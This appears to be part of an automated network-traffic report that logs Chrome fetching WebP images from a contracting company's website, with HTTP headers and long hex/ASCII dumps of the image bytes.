                                              2024-09-27 06:20:21 UTC8000INData Raw: 55 93 1e aa cb 95 7e ea f6 9d 1e 1e a7 c3 e9 c2 66 08 dd 86 1c dc f9 92 6b 3c 83 53 cd cc d7 80 20 e2 bc 4c c8 69 a0 bf 1e 00 1f bd f1 4e 05 8f eb 47 32 75 ce 8b 60 1d 1c 34 88 0c 2e c9 cb 3d e5 c1 07 4d 3b 7c a9 b6 bf 61 1b 7c 62 c7 60 45 4d 96 08 94 ae 7f 67 a2 40 4c 70 28 be 9d 31 eb 84 e4 5b 54 2f b8 de 8e 52 13 30 04 d5 c5 23 d1 cc f0 25 f0 37 99 26 4f f4 d5 32 91 0f df 60 ba 20 10 af e3 dd 61 7c 94 e6 16 38 f1 4c 6e 81 d2 7f c8 23 15 bf 11 11 a9 8b d6 f8 de 02 70 73 42 34 63 66 62 16 3a 23 b7 61 73 ca b9 c5 e5 e3 96 c7 6e af f4 8f 6c 08 b6 6b 2c 32 49 cd a0 d1 63 f9 43 e2 78 a2 5d 7a 91 d4 d1 91 44 70 9a 48 a0 f3 68 77 5a 4e 99 1b 2f 7f bd c2 67 e3 29 f9 63 f3 c0 ef 48 33 11 b1 65 d2 ec 4c 08 81 c6 bf 2e 87 9d a9 45 b8 25 02 a1 1e 36 13 99 88 1e 8c
                                              Data Ascii: U~fk<S LiNG2u`4.=M;|a|b`EMg@Lp(1[T/R0#%7&O2` a|8Ln#psB4cfb:#asnlk,2IcCx]zDpHhwZN/g)cH3eL.E%6
                                              2024-09-27 06:20:21 UTC8000INData Raw: eb c2 32 6c 58 83 27 84 7f 24 3c c6 be fd 18 bf 86 07 a8 38 d7 27 3f d4 7c f8 5e 34 96 37 e4 93 87 6c 5f fa 36 61 2b 31 8e d4 13 6a eb a0 61 e7 33 b9 1e 48 3c bf a6 55 66 df 97 f3 88 25 d8 5f a4 38 de 38 1f 69 35 bd 95 e4 39 0c 88 1f c8 3b 53 31 af 6f 83 77 f4 ff a5 b8 e7 7f b9 32 3a 64 a9 ba 27 69 12 ad 70 82 89 53 01 e5 1f 1f 48 69 2b 63 25 a4 82 78 a0 44 0f cb 55 30 e4 29 9b 63 6e 8e 38 b1 ae af 5c 0a 65 bd 1d 73 1a a0 f2 73 2f b9 eb c2 d2 88 bb 8e 7b c6 16 f5 87 c1 4f 7a 11 df 9c 64 5a 0b dc cf 21 01 68 03 a9 47 48 34 53 d6 03 b7 e7 65 4e 07 8e fe 40 91 46 b2 31 ab d0 d0 34 41 97 9d b0 66 11 eb 30 47 fb ce d9 ee 1b 37 34 0e 27 55 40 84 4b 74 3c b9 1f b0 25 93 e3 d5 89 54 9e 80 7f 4a 5e b6 af b3 f0 2c 27 f7 81 48 95 6d 2b ea f6 71 23 b7 fa 6b 27 99 3c
                                              Data Ascii: 2lX'$<8'?|^47l_6a+1ja3H<Uf%_88i59;S1ow2:d'ipSHi+c%xDU0)cn8\ess/{OzdZ!hGH4SeN@F14Af0G74'U@Kt<%TJ^,'Hm+q#k'<
                                              2024-09-27 06:20:21 UTC8000INData Raw: a9 e4 9f 31 e9 d5 1c e0 9f e4 63 51 0f 68 a8 45 4f a6 f3 6e cf dd 1b a1 bc 6f 49 6f a0 ae 0e a3 ed c8 78 b0 b8 ab 65 91 4e bc 9c 3a b0 6e 58 1d d4 a2 c8 2e 1b e3 f1 a0 4c 86 e5 78 1e 9b 5a e1 2e 55 d3 2f 90 f5 f3 5b c4 10 41 30 29 f9 e7 3e 8c 3d 8e 84 b7 be 87 d2 fd b2 4a ef ce dc 4f 5c c9 4d 91 dd 23 ee 02 bc d1 13 ff 67 64 09 26 19 8f fb 8a 81 ad f6 f0 8d 62 52 5c 7a 69 23 7c 52 35 d1 cb b0 99 df cc 65 c5 ed 9b 2b eb 3f 31 d6 36 42 07 25 48 34 7d 2b e4 7f e8 89 e3 be 89 be ae ed 81 9a 84 fa ba b2 50 e4 ca 06 dc 47 7e b6 0b b3 ca 20 7c 50 7b 27 be 37 43 f8 3e 7b 80 a1 63 d4 14 e1 bf d7 4b 6a c6 24 a7 37 b9 a4 0e 0a 97 95 7e 36 dd 73 8d 68 6e 6f 1e 98 73 fa 6d 16 c0 d1 9e 3e 63 b3 48 38 21 ef fb d2 6e 25 46 f5 52 1c b6 06 95 53 9b bc d7 33 bf d8 ca 18 5a
                                              Data Ascii: 1cQhEOnoIoxeN:nX.LxZ.U/[A0)>=JO\M#gd&bR\zi#|R5e+?16B%H4}+PG~ |P{'7C>{cKj$7~6shnosm>cH8!n%FRS3Z
                                              2024-09-27 06:20:21 UTC4061INData Raw: f9 40 99 3b 3d 3d 1d 56 40 95 72 84 48 2c dd 95 28 c9 e6 d0 20 cb 5d 3b 68 e3 53 b0 14 9d 37 48 33 1e 94 05 77 a4 f3 96 6c 71 74 36 e8 2f e0 b2 f1 83 f1 7d 9b 8b 01 de b5 9a b2 c8 5e b6 3b 45 4c ef 65 06 5e a0 23 b7 b5 8c 09 96 67 6a d5 66 ac b6 d8 7e 68 6f c5 24 85 b8 5f d6 1e 6c 4c 85 b1 52 13 ba 08 e3 f6 96 aa 1b dd 9c 39 ca 7b e4 83 13 d7 74 db ef 61 c2 53 8d b2 ae ac 86 b0 dc 29 85 51 42 76 52 29 47 e5 de a4 91 17 25 1d 75 8c e3 e5 a4 09 30 45 c5 d5 50 27 a4 a2 c3 2d d3 a9 bd 71 28 14 25 55 87 86 9f 47 14 46 34 65 79 00 a2 ae ed d9 81 98 2f 0f 6b 0d db 89 22 05 13 52 fe 5c 3e 04 21 d9 4c 15 e8 2e 2d f7 9e 66 32 93 a4 81 a2 d0 8b e4 e1 7d 4f d6 93 8a 80 68 d8 6a e1 cc 26 c9 5b e2 68 24 34 60 49 72 6c 94 3d 25 91 f0 3b a2 85 89 f5 57 9a c7 8d a4 f6 ef
                                              Data Ascii: @;==V@rH,( ];hS7H3wlqt6/}^;ELe^#gjf~ho$_lLR9{taS)QBvR)G%u0EP'-q(%UGF4ey/k"R\>!L.-f2}Ohj&[h$4`Irl=%;W


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              124192.168.2.465461173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC464OUTGET /uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:04:58 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 83836
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:21 UTC7931INData Raw: 52 49 46 46 74 47 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 47 01 00 50 5a 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 51 a9 25 bf b6 a7 76 9a 73 f0 1d 09 62 6e 96 bc 3b 69 f7 fa 16 20 9e 83 db 97 35 c1 be 06 0c 17 37 79 71 fa 85 45 45 96 8a fd ff 89 d7 ac ff b0 e9 fd ff 73 c1 d5 03 3c c5 73 c5 fe c5 de cf 17 af fe a2 7b b5 f6 7f d5 7a 81 f1 ff 8c 7f 66 fc 67 af ef f9 7c a2 f9 af 29 4f 7b ef 79 ff 23 f6 ef de 7f ea df 61 bf ea 1f e8 7d 4e ff e9 fd d5 f7 f3 fd eb ff 17 e5 1f c2 7f ea bf f3 7f 79 bd ed fd 3a ff a1 f5 28 fe d3 e9 e7 eb 21 e8 eb e7 39 ff e3 f7 a7 e2 63 fb af ff 3e a0 0f ff fe dd fd 0d fe 3d ff bb cf 87 d0 3f c3 ff e5 fe f7 c9 1f d1 bb 0a b1 0f f5 de 0c 7f 65 f9 e7 eb 57 fc ff 06 ff 56 fe 8b d0 83 cd de 98
                                              Data Ascii: RIFFtGWEBPVP8XVP8 GPZ*>lQ%vsbn;i 57yqEEs<s{zfg|)O{y#a}Ny:(!9c>=?eWV
                                              2024-09-27 06:20:21 UTC8000INData Raw: 7d a8 57 b3 92 c2 5e a2 78 47 43 db bb 91 11 02 1a 6f 32 59 15 94 1c 38 c0 85 6d 0a 2a 07 ab 6b b4 cf 71 72 04 72 12 ba a2 fb 98 5c 51 3e cf fc 91 ff 05 99 7d 3d ad 41 89 f1 42 51 8f 19 ee 22 4b df 6a ae 84 37 04 20 43 69 94 92 83 fe ad e5 8d 41 31 af 22 8c 50 18 81 f8 3f 5e e3 e4 ad 1c 4e 60 b3 b0 7b 26 98 f7 26 2c ba 2b 29 e3 ae db 82 fe c9 5d 83 8a 0c 32 9e 85 ab 43 15 b2 1a 6b 46 06 c0 81 e0 42 2e 5c 6b ed 83 74 43 de 93 48 8e 11 48 c9 c0 2c d6 5d 36 24 e1 dc 0a 16 9d a7 9b 28 5e 94 42 29 12 df 32 29 9a 95 d7 c4 c0 6a dc af ca 00 e7 1b 1e 7e 78 50 2f da c8 c1 cd 93 86 a7 04 8c 17 aa 7d 77 84 ca 0a 73 95 79 e4 84 da 13 22 a4 46 4e d1 7b 7a 8c 37 54 b6 98 5c 5b 14 91 1f 6d ee 9a 48 0e 1d 9f 5f 71 70 78 98 1d f5 db 2c 00 f9 a5 d3 df 6b 6e c4 3c ee 39 d2
                                              Data Ascii: }W^xGCo2Y8m*kqrr\Q>}=ABQ"Kj7 CiA1"P?^N`{&&,+)]2CkFB.\ktCHH,]6$(^B)2)j~xP/}wsy"FN{z7T\[mH_qpx,kn<9
                                              2024-09-27 06:20:21 UTC8000INData Raw: 87 36 14 ee e0 3e 0b 51 d0 f9 77 b9 46 fb ba 29 21 25 2d 11 71 3a a5 86 00 9e 0e fe a7 d0 ed 62 20 fe 44 79 c4 e7 15 1b e2 44 97 cf 24 5f 20 f2 0c 95 a7 62 f1 55 ec 31 b1 40 34 3f b2 a6 4c 37 82 53 98 dc 61 22 1b e8 7e 59 8b e4 a9 60 db d1 74 ea 17 d6 39 39 9c 25 de ef 34 5d e3 44 74 ee 86 3e 26 53 b2 da ae 8f 87 35 e3 29 ac 19 2a f8 20 e3 38 52 85 fe 9b cb f5 e9 83 fb f4 70 62 4a 0a 7b 56 43 43 f3 47 38 42 4c a7 1b 25 fb d6 07 ad a0 fe 93 cb b0 c1 b8 ad 45 e4 d7 94 5f b4 e4 5e c3 e8 b7 1c e9 71 5e a6 d4 19 45 54 9a 00 2e f9 aa f2 ad bb 3f 8b 6f 40 23 94 8f 27 45 98 e9 3e 34 ae 19 c1 09 9a e5 ab 90 d9 e0 6c aa 57 92 d7 fa 33 92 af 0d f9 ef f7 3f cc b2 50 c1 a0 42 56 ba fa 82 66 79 79 be 84 33 50 b2 ca 45 0c e3 c3 b5 b9 1e 9f f7 ef 7f da 3f 0e f1 de 60 d6
                                              Data Ascii: 6>QwF)!%-q:b DyD$_ bU1@4?L7Sa"~Y`t99%4]Dt>&S5)* 8RpbJ{VCCG8BL%E_^q^ET.?o@#'E>4lW3?PBVfyy3PE?`
                                              2024-09-27 06:20:21 UTC8000INData Raw: 72 dd 08 74 92 b7 a2 84 93 e0 43 43 ef 20 fe 82 33 02 94 21 db cf d8 24 5e cc 0c 17 87 5f c6 f1 6e 20 af 7e 55 ae f9 fe c5 15 9c 3f d4 1f 16 90 2c 8e cc 7f 25 38 eb 0f 55 ac 40 0c 1d 67 37 46 12 aa fc d5 a4 9e d1 17 ad 2f c9 00 2b d1 c3 19 25 b6 68 82 73 a7 f6 5c 95 19 b3 78 e9 23 b5 75 14 80 5c a8 6e f1 d0 37 a7 45 b7 24 d1 c6 00 61 49 80 27 e3 bc 2b 5b bf ce b1 d2 9f bb 5a e6 b9 32 cd c9 15 d6 8b 17 5a 39 b5 e7 ed 95 38 73 91 84 51 fc d8 3d d1 c8 21 f8 8d 7e a3 8c f8 c9 1e d2 42 80 1d d8 3f 40 9f ac 26 4c a0 fd 5a 05 00 e2 84 81 d6 08 2e b0 e9 fa d6 15 3c eb e6 2d 74 14 b0 39 52 42 c0 75 48 25 49 ab 3a 92 6b 2d 95 64 a2 c5 58 90 16 f3 0d f5 21 f5 e3 4f 2b 19 70 11 73 e3 fc cc f8 2d f1 75 77 d0 c8 ea 8a bc e3 0e 2f 5f 12 c8 82 05 f3 d8 c0 68 9a 86 16 bc
                                              Data Ascii: rtCC 3!$^_n ~U?,%8U@g7F/+%hs\x#u\n7E$aI'+[Z2Z98sQ=!~B?@&LZ.<-t9RBuH%I:k-dX!O+ps-uw/_h
                                              2024-09-27 06:20:21 UTC8000INData Raw: 5e bf 88 c6 7b 9a ec f1 9a 1d af 92 d3 fb 84 30 9e 6b 65 76 ba 4b 04 03 7b 78 51 3c 2e 93 92 b8 38 71 15 e8 2c ad f3 d7 57 c3 01 89 5e 4b 40 60 b4 de 86 f6 7f e4 b7 67 ab b4 63 94 95 fe d7 85 47 f4 81 15 c3 5e c8 57 5b f5 06 28 dc 3c 0d 6b 07 93 d0 01 a5 87 a9 6d c4 09 84 d1 90 81 19 f1 16 e0 79 8c 69 36 8e 94 f3 19 cc 6b 16 d5 b8 97 71 e4 15 26 d1 67 0b 74 fe b2 68 2f dc 8f 84 14 09 cc da e7 f9 1b ab 09 67 b3 0c 8f 0a fd e6 d0 a0 73 8e aa 03 84 00 2f 1b ee 59 a6 8a 75 9a 0f a8 42 8e ce 14 4a a2 e6 a1 d8 10 17 d6 27 ff 85 88 a9 b2 c8 17 57 22 3b 1a df 1c 74 20 d2 ba 97 7d 49 37 ab d0 a1 98 18 29 ea 09 ca 1e 73 58 4a 16 4d a2 b1 be 34 e0 24 cd 3c fb d9 41 77 db 86 77 f1 45 05 07 f5 57 47 ae d9 0e 7c 98 b5 a2 d1 a6 ec aa 7b 59 3f 91 e1 e6 4a 53 8d d9 ef 4c
                                              Data Ascii: ^{0kevK{xQ<.8q,W^K@`gcG^W[(<kmyi6kq&gth/gs/YuBJ'W";t }I7)sXJM4$<AwwEWG|{Y?JSL
                                              2024-09-27 06:20:21 UTC8000INData Raw: e6 3f ef 5a 8d 1f 73 8b 60 45 ff e7 21 58 9a 34 63 46 5d 2f 7e 1d 83 5e e0 d3 cc d1 1c 3a f5 3e 7c 57 c5 94 0c a7 19 3f fa 8d 40 5f dd 99 b3 c6 6a 09 8b ef e8 24 7e a1 39 34 83 22 82 c0 0c 56 21 f2 29 a3 fa 6e c9 7c 53 4b d0 48 57 fc 94 da 3d 73 3c 08 ac 94 a7 37 33 8a 11 76 7d 8e 3e e2 5b 5d 73 3a 28 01 82 b1 aa b0 8a 7f fe b8 3a 90 8b 63 41 3f 42 79 1a 6f 55 2f b4 1e b3 bf 0d 64 4f e3 93 23 68 50 53 30 c5 d8 0e 82 77 77 69 63 c7 48 83 71 20 af c8 97 c6 e4 e4 e4 c1 c5 92 87 26 91 ed 53 70 95 32 2b 79 f6 a2 32 0f 95 bf 78 f9 e8 07 94 94 e8 dc 96 a1 3f 41 7e 3c 95 74 58 4f b0 7c 4d 72 a7 c9 5b d2 fe bd 11 a2 fe a0 ce fd aa 3f 16 35 7f 66 62 d9 01 09 6b fb 5d 7a d9 f7 03 93 b3 08 68 11 00 53 9a 01 e1 c7 93 ca d1 6c 2c ac cd 1c bf dc d2 2c a2 8b 4f cb 9b 8c
                                              Data Ascii: ?Zs`E!X4cF]/~^:>|W?@_j$~94"V!)n|SKHW=s<73v}>[]s:(:cA?ByoU/dO#hPS0wwicHq &Sp2+y2x?A~<tXO|Mr[?5fbk]zhSl,,O
                                              2024-09-27 06:20:21 UTC8000INData Raw: 04 48 d1 6c 83 01 17 c0 9d fc 66 3c bc b4 f9 ec 1c 05 e0 41 54 d5 d0 ca 9d 8b 5c 92 64 1f e4 5f 16 74 01 a9 d1 b9 aa a3 c9 d2 67 c5 5a e2 f1 c4 53 fb 09 11 b7 6c 4b 36 2a da 9f f7 6d e4 7b c9 91 c6 b8 16 83 7f f4 b3 b9 49 f0 6b 36 14 b6 bc db 91 a7 a4 61 19 61 e1 a0 c2 b8 40 ac 02 4e df fa 96 fe 3b af 6b d9 af ea 46 fd 02 bf 0e aa ac 04 a4 79 fb 02 eb e5 b3 b5 1e 78 b4 64 a6 f2 1e 26 b5 ee 88 6b e2 9f 72 ca 3f c3 9d f1 f9 30 f6 e5 98 33 6b 89 17 25 39 13 00 38 14 fc a6 cc d7 53 aa b5 aa a3 ea 7f 5b 08 00 5c 75 46 93 cb e8 32 84 71 f5 cf 56 e3 9d b2 4c bd d5 c8 35 39 be 99 db d3 07 f3 02 84 ff 04 30 01 a2 4c 4c b4 65 d2 15 a0 01 1d 91 b1 bd 19 c1 00 1e 33 2a e8 4b 2d ad 35 bd 42 5b fe b3 28 ae 51 1f 93 f6 02 ad 59 7a 17 de df 06 d3 f6 38 9e 06 2e b0 27 ed
                                              Data Ascii: Hlf<AT\d_tgZSlK6*m{Ik6aa@N;kFyxd&kr?03k%98S[\uF2qVL590LLe3*K-5B[(QYz8.'
                                              2024-09-27 06:20:21 UTC8000INData Raw: ee 39 46 8c 05 71 4a a2 08 04 88 f9 43 ab 54 f0 6a 1d 95 7e 75 33 6e 78 b4 e4 54 46 6c 8c c1 cc c5 ec c4 9c 42 b8 73 d1 1c 4d 22 95 cb 9f 7c 16 c5 2f 95 ec ff b2 e2 09 e2 18 ce 10 ec 71 71 a4 dd 0b 96 2f d0 fa 0e a6 c5 b1 cd 75 94 4f 4a 14 14 8d 1d df f7 9f eb 3d 64 2b 32 38 9e 28 aa 52 ce 31 fb fd bf f4 42 7d a0 09 33 f3 a8 21 9b 18 5b f6 e1 54 f0 e4 67 df a3 58 32 6f 17 96 32 b6 4f 28 da 0c fa 7c 6b 11 45 bc 83 f6 70 8d aa 19 47 20 4a c5 60 73 0b 07 5b ef 39 0a 2b 09 ed a5 70 42 9e 1f 56 51 04 67 dd 41 bc 12 9b 50 99 07 43 0a db cc 07 b7 ae a2 cf 0f c5 f5 5a c0 77 52 44 7a 99 8a 05 3b 9a 63 78 e8 02 cb 00 65 01 21 5f 5f b0 90 58 7e e1 71 83 c1 1d ed a7 a2 31 f9 74 0d f1 e7 29 be 4f e4 fa 41 34 7e fc ec 22 3a f4 0d ba 71 4e 31 b2 8c fb d1 da 88 b9 8e 35
                                              Data Ascii: 9FqJCTj~u3nxTFlBsM"|/qq/uOJ=d+28(R1B}3![TgX2o2O(|kEpG J`s[9+pBVQgAPCZwRDz;cxe!__X~q1t)OA4~":qN15
                                              2024-09-27 06:20:21 UTC8000INData Raw: 7c 29 fc f3 54 a8 76 f1 06 e7 88 f8 03 b6 7e 9b 4a e4 03 d8 d4 4b ec ac b5 4b 6d 38 b5 6f 43 44 9a 25 6c 1f d1 9b ee e1 e7 0b 12 52 2e 5b 79 44 b5 d2 b2 bd 14 58 d5 82 ff d9 10 42 5b ea ba 4f cb 8b 35 44 8d e5 e7 cb 81 0c 33 4d 4d b1 0f 4b 11 3e 51 db ab 73 f8 a2 cd f1 c6 d8 f2 b6 95 2d 4e 71 29 15 8c 92 bc e1 25 5e bc 51 a5 2c 7e cd 5d 45 21 11 a7 58 0c 8d cb b9 1f ee a9 29 c9 e0 86 78 c2 74 bb 9c 9c 4a ff e8 9e 95 e5 85 9e a3 ac a3 04 d5 48 3c 96 a2 4d 2f a3 e7 31 ae aa 0e 83 aa 23 1e 8b 6e dd 9c 9c 6b 43 91 15 49 56 9c b1 2f ff 50 81 25 75 ce db 44 d9 43 0f 5c c1 fa bc 06 c1 2f 74 81 e2 51 e3 cf ef 7a b5 a8 9d 21 95 9c 0d e9 74 29 0a 05 b7 c5 7f 31 5f 3a f8 3b de 76 2d 28 c8 a3 7e cd be 16 6e 32 fa a3 23 04 62 09 67 9d 9c b7 67 25 78 8c f8 82 11 40 83
                                              Data Ascii: |)Tv~JKKm8oCD%lR.[yDXB[O5D3MMK>Qs-Nq)%^Q,~]E!X)xtJH<M/1#nkCIV/P%uDC\/tQz!t)1_:;v-(~n2#bgg%x@
                                              2024-09-27 06:20:21 UTC8000INData Raw: 93 8c a1 4a 76 c0 35 c3 6e ec a7 62 52 1e 39 b2 02 d8 6d df 65 20 b4 1b ce 7b 7d 3d 07 ad 20 1a 6a 27 7b 5c 25 e1 e0 61 70 e8 79 d0 68 37 af 98 04 5a 0d 79 70 a0 f8 b2 85 ad 2d 28 6e 33 f3 71 8e ae 8d 46 fc b4 72 25 c6 88 4d 1c 54 26 3e 41 b5 bb 3b 82 6c 56 31 1b f1 30 61 fc 37 ad 6d 7e 76 25 28 e0 11 13 01 c6 66 c6 42 f8 af c0 28 2e 46 c3 d6 a0 1f f0 49 87 10 1d fe ea 17 8f 3f 42 fa d4 fc 51 49 0a 53 94 19 f1 3a 51 30 2f d3 e5 6f 21 93 1e de 95 5e 92 a3 75 73 7d 91 ae 40 f4 3c 57 47 a1 25 09 89 92 2e 82 08 8d d3 c3 30 30 40 ad b2 4d 69 82 46 52 f4 46 21 b5 6c d8 1f a4 18 07 bf fa e6 71 85 3f 4f 5a e3 3c ec 22 5e bf 69 99 01 61 55 b4 ae c9 f4 ce e4 cd 83 78 0f 53 db 06 f1 05 ae 36 10 c4 8c 5b e3 dd 4c 93 b6 a1 bb 10 0f 79 e0 54 08 8b d4 79 bc f4 86 1f 31
                                              Data Ascii: Jv5nbR9me {}= j'{\%apyh7Zyp-(n3qFr%MT&>A;lV10a7m~v%(fB(.FI?BQIS:Q0/o!^us}@<WG%.00@MiFRF!lq?OZ<"^iaUxS6[LyTy1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              125192.168.2.465460173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC465OUTGET /uploads/projects/21/ccbc0b3107341d28610c4ec42a1c8641.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:45:17 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 47858
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:21 UTC7931INData Raw: 52 49 46 46 ea ba 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 76 ba 00 00 d0 f0 04 9d 01 2a cf 04 a3 03 3e e9 68 ae 54 29 25 38 3d a3 11 0b 2b b0 1d 09 67 6e 73 87 b7 31 ed 34 fc bc 3f 2f fd dd 5e 1b f7 d7 81 ae 78 3e 44 bd cc ff f8 df 1a e4 6c cc bb 57 f3 3c 5a fb 3b b3 7f f0 bf f2 bd 83 7c bd 33 9b 72 74 c9 38 8f 56 e4 7f fc 0f 77 fd 85 b9 27 ec 4f f6 ff 6f d9 0b 43 df 2d d3 3f ee bb de 7f f6 f3 ff d2 5f c9 4f 44 26 ec df ae bf f2 3e 9c cf 4d bc 22 ef fd 5d f1 7f d1 fd c1 ef 89 fa 1f f9 ff da 7b 98 63 7f eb fb bb ff 1e ce e7 fc 7e 2c fe eb fc e7 a1 07 ed 1e 3f 92 5c e6 d5 06 fe a1 e5 8b 42 bf b9 5a 61 fc 3f 44 af fe 1e 93 7f 61 ff c8 40 89 07 82 62 30 42 81 6b 81 d6 2d 94 d5 e5 2b 26 4c 0b 89 94 ad a4 14 4b d2 85
                                              Data Ascii: RIFFWEBPVP8XVP8 v*>hT)%8=+gns14?/^x>DlW<Z;|3rt8Vw'OoC-?_OD&>M"]{c~,?\BZa?Da@b0Bk-+&LK
                                              2024-09-27 06:20:21 UTC8000INData Raw: 19 fc bb e7 40 e9 cb ec 44 2f fa b8 39 21 aa df 1f d0 a5 f9 58 6d f5 a8 2c 58 e3 56 a4 a9 b3 0a 40 5b af fb c1 28 5d 5c 4d 6f d0 4a 49 12 7e 42 53 db 19 0b d7 dc b8 c7 50 b6 d1 94 74 46 03 38 18 d8 12 a3 16 83 a7 23 55 ea 92 83 8c 7d 0f 97 06 b5 e2 51 6b b8 02 f7 42 bc 51 0f 3f df f6 fd 05 47 39 ae d3 66 36 a8 80 8f de 05 66 1e 5c e5 91 fb a0 ce 48 36 c1 ac 36 1b ad 7a ce 54 7c bc 05 f8 14 2a f9 f6 3d a0 5d ee 75 d1 4e 5c a7 e0 f7 07 8f 12 8f 82 31 4f 8c c6 10 13 a9 f2 c0 35 b6 7c 75 14 4b 20 2b db ae 10 fa 9f 04 49 e9 e3 2c 47 17 7f 1c 09 13 f9 14 53 a8 32 20 7d 61 86 78 e6 0d 01 2b 0d 91 9c d7 74 c3 a7 da 29 a1 3e 31 51 8e ed e8 1b c9 5a b3 ef 44 0d 27 9c 96 a1 20 4a cc 59 a0 e7 10 8a 09 19 f0 1a 46 36 02 06 aa e4 1c 35 89 67 7a 05 e3 d7 55 95 4c a3 e0
                                              Data Ascii: @D/9!Xm,XV@[(]\MoJI~BSPtF8#U}QkBQ?G9f6f\H66zT|*=]uN\1O5|uK +I,GS2 }ax+t)>1QZD' JYF65gzUL
                                              2024-09-27 06:20:21 UTC8000INData Raw: ee 81 42 61 85 92 31 f5 6d c5 02 ad 1e 7c cc 69 d0 eb 03 d8 14 92 ff fe d2 4f 22 5c 39 ba 15 7c f0 fd bf 74 a5 99 96 31 19 1d f8 80 ed b7 ed 35 b6 4f b5 36 5c f4 9b ce 6a ad be e8 81 be 55 f2 b6 e5 d7 90 1b 79 0b d6 fe fb 76 20 36 eb da 9f d9 46 2b d9 42 fd 89 a4 af 9d 81 6c 47 90 69 6b 60 f8 00 d5 f0 43 52 49 f7 cb 7a b8 b1 8c 23 5b a1 f3 2c 0a 52 da 2e 36 64 a4 64 fe c9 82 2e 6d 9d 56 69 d4 ef 31 2f b4 fd d4 cd 2f 79 ee b9 3c 9b be cc 6d 09 40 8a e6 8a db 76 1d cb 35 5a 66 b7 50 ba c1 44 5b 5e ef e7 89 8e 57 a4 de 98 01 ae cd d4 72 c9 60 43 44 fc b0 5f 8a ff a4 00 f1 49 6a 12 dd a0 e1 45 ba e3 68 91 15 f6 13 4a c4 6a f9 2b e7 60 64 d2 60 c5 c1 1c a6 56 b2 71 2c 29 1a 9d 0f 5e 8f ce b5 03 01 83 7f 2d da ad d4 f5 38 91 03 e2 d9 27 63 ee 1f ca a6 74 d3 74
                                              Data Ascii: Ba1m|iO"\9|t15O6\jUyv 6F+BlGik`CRIz#[,R.6dd.mVi1//y<m@v5ZfPD[^Wr`CD_IjEhJj+`d`Vq,)^-8'ctt
                                              2024-09-27 06:20:21 UTC8000INData Raw: c8 f3 93 f8 74 6e 0d a2 7c d4 83 50 73 38 d9 b6 8b d6 32 db 0f d0 82 4b 32 ef ae b2 cf 9d 8a 52 db f4 47 b5 79 34 59 01 72 02 b8 69 bd e9 48 23 5b f3 40 2d 8e 5c a2 89 93 9d 7c 95 ae 07 a8 c4 e8 5b 52 b7 96 15 f9 55 7c f9 84 e1 29 0b 8b 7f 37 14 ab 44 3f 34 8d 1d 83 6a 18 c8 8a db 9b 55 bd 1f 60 3f 9a 57 64 85 49 36 32 f0 82 42 f0 4a 76 26 1d 0f 5f 2d 78 42 6d 5f c7 aa f3 c5 0e 7e 78 d2 06 ae df 1d 3d 57 34 d4 1e 65 0e 16 ef 4c c7 da 6d 6d 8d 7c c0 60 3a 71 99 93 7f 9e 33 7b 1d 00 2b 59 27 5d 41 e9 13 dc 1c fb 4c 3f 57 ee 0c af 6b 9b 8a ba 28 46 e2 e9 63 47 4b 45 bc 2e d8 8c 4d 6c 8b 02 d4 ea 0a 04 5c a5 e8 05 8b 4e c8 31 87 d5 21 8b 93 bd e2 86 a4 10 bf 2d 42 6f 75 b6 97 a8 37 05 bc 60 42 5c b6 69 b5 4f 8e 8e 45 4a 3f 30 fa 11 bf 54 8d 51 ce 24 4e bd 2d
                                              Data Ascii: tn|Ps82K2RGy4YriH#[@-\|[RU|)7D?4jU`?WdI62BJv&_-xBm_~x=W4eLmm|`:q3{+Y']AL?Wk(FcGKE.Ml\N1!-Bou7`B\iOEJ?0TQ$N-
